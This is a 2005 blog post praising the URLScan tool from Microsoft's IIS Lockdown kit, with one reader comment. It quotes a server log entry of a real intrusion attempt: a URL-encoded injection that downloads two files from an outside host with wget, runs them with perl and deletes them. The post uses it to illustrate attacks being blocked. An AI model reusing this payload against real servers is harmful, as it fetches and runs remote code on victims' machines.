RobLog

Web Design in the World of .NET (C# and VB.NET, XML, and Javascript). I learned how to program from TheDailyWTF.com!
posts - 140, comments - 129, trackbacks - 5

My Links

News

Main Site Cert Corner Goals About Me

Article Categories

Archives

Post Categories

Image Galleries

.NET

Personal

WOW


URL Scan. A great Tool!

I love this tool.  It comes as part of the IIS Lockdown Tool from Microsoft.

And it seems to work well.   Here lately I have been the target of a few (! actually someone really wants to get in!) attacks from a source (or sources) that is trying to get in by using a very long URL that will cause an overflow.

HERE is an example from my logs:

2005-01-04 06:26:02 65.75.185.100 - GET / ~/blog/Rss.aspx&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; 404 4203 HTTP/1.1 LWP::Simple/5.803 -

69.61.61.146 - same URL
66.98.214.89
64.191.29.200

Tsk, tsk.  When will people learn?

posted on Wednesday, January 05, 2005 10:22 PM

Feedback

# re: URL Scan. A great Tool!

I get people trying to overflow my server all the time. Thing is, most of these people seem not to really be knowing what they are doing. Trying an IIS exploit on an Apache server doesn't really give the impression of a high IQ.
1/11/2005 3:24 PM | Drak

Post Comment

Title  
Name  
Url
Comment   
Protected by Clearscreen.SharpHIPEnter the code you see: